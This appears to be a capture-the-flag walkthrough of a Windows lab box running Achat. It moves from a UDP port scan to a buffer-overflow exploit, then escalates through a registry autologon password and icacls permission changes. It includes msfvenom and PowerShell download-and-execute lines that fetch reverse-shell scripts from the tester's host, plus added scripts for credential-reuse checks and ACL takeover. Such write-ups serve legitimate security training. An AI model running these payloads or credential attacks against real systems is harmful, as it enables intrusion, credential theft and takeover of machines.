Basic information

Port scan

A full UDP port scan is required; the uncommon ports 9255 and 9256 are the interesting ones:

$ sudo nmap -sU -p9255,9256 10.10.10.74
Password:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 14:29 CST
Nmap scan report for 10.10.10.74
Host is up (0.084s latency).

PORT     STATE         SERVICE
9255/udp open|filtered mon
9256/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds

9256

Searching for this port shows it belongs to Achat:

Achat bof

exploit

The meterpreter session obtained from the msf module drops after a few seconds, even with auto migrate enabled:

Powershell

Switching the payload's execution method to a PowerShell reverse shell works and is stable:

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/Invoke-PowerShellTcp.ps1')" ...

user flag

The user flag is on the alfred user's Desktop:

Privilege escalation enumeration

Intended path

PowerUp finds a cleartext password in the registry (Winlogon autologon):

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/PowerUp.ps1')
Invoke-AllChecks

[*] Checking for Autologon credentials in registry...


DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :

This autologon password is reused as the Administrator password.
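As an added example (not part of the original writeup and not PowerUp's own code), the following PowerShell reads the same Winlogon values that PowerUp's autologon check reports and then tests whether the recovered password is also valid for other local accounts, which is the password-reuse question the writeup answers by hand. The account name `Administrator` is an assumption (the local admin name on this target); the registry path is the standard Winlogon key.

```powershell
# Added example: replicate PowerUp's "Autologon credentials in registry" check
# by reading the Winlogon key directly, then check password reuse before using it.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props = Get-ItemProperty -Path $winlogon

# The six values PowerUp prints; on this box only DefaultUserName/DefaultPassword are set.
$fields = 'DefaultDomainName', 'DefaultUserName', 'DefaultPassword',
          'AltDefaultDomainName', 'AltDefaultUserName', 'AltDefaultPassword'
foreach ($f in $fields) {
    '{0,-22}: {1}' -f $f, $props.$f
}

if (-not $props.DefaultPassword) {
    Write-Warning 'No cleartext DefaultPassword under Winlogon; nothing to reuse.'
    return
}

# Password reuse check against local accounts. ValidateCredentials performs a real
# logon attempt, so every call produces a 4624/4625 event on the target.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext(
    [System.DirectoryServices.AccountManagement.ContextType]::Machine)

# 'Administrator' is an assumption: the local admin account name on this box.
$candidates = @($props.DefaultUserName, 'Administrator') | Select-Object -Unique
foreach ($u in $candidates) {
    $ok = $ctx.ValidateCredentials($u, $props.DefaultPassword)
    '{0,-15} {1}' -f $u, $(if ($ok) { 'VALID' } else { 'invalid' })
}
```

Run it from the alfred shell; a `VALID` line for `Administrator` confirms the reuse without first spawning a process as that user.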

Unintended path

Permission misconfiguration: Alfred has no access to root.txt itself, but does have permissions on the Administrator Desktop directory:

Privilege escalation && root flag

icacls

Modify the file's permissions directly, then read root.txt:
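As an added example (not the original writeup's commands), the PowerShell below first shows the owner and DACL of both the Desktop directory and root.txt, so the misconfiguration is confirmed before anything is changed, and only then grants the current user an explicit ACE with icacls and reads the file. The path `C:\Users\Administrator\Desktop\root.txt` is an assumption (the usual location on HTB Windows targets).

```powershell
# Added example: verify the ACL misconfiguration, then fix permissions for ourselves.
# Path is an assumption: standard root.txt location on HTB Windows boxes.
$desktop = 'C:\Users\Administrator\Desktop'
$target  = Join-Path $desktop 'root.txt'

# The owner of an object always holds READ_CONTROL and WRITE_DAC, so if the current
# user owns the file (or the directory whose ACEs it inherits), the DACL can be
# rewritten even though no ACE currently grants read access.
foreach ($p in $desktop, $target) {
    $acl = Get-Acl -Path $p
    "== $p  (owner: $($acl.Owner))"
    foreach ($ace in $acl.Access) {
        '{0,-35} {1,-6} {2}' -f $ace.IdentityReference, $ace.AccessControlType, $ace.FileSystemRights
    }
}

# Try to read first; only touch the DACL if access is actually denied.
try {
    Get-Content -Path $target -ErrorAction Stop
} catch {
    $me = "$env:USERDOMAIN\$env:USERNAME"
    # Braces keep PowerShell from parsing "$me:F" as a scoped variable.
    icacls $target /grant "${me}:F"
    if ($LASTEXITCODE -ne 0) {
        throw "icacls failed: WRITE_DAC on $target is required (owner or an explicit ACE)"
    }
    Get-Content -Path $target
}
```

If icacls fails here, the current user does not hold WRITE_DAC on the file and this unintended route is closed; fall back to the autologon password.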

Administrator

Use the password to obtain an Administrator session and run a reverse shell from it:

# Build a PSCredential for the local Administrator from the recovered autologon password
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd);
# Start a new powershell.exe as Administrator that downloads and runs the reverse shell
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.6:7777/Invoke-PowerShellTcp.ps1')" -Credential $creds

References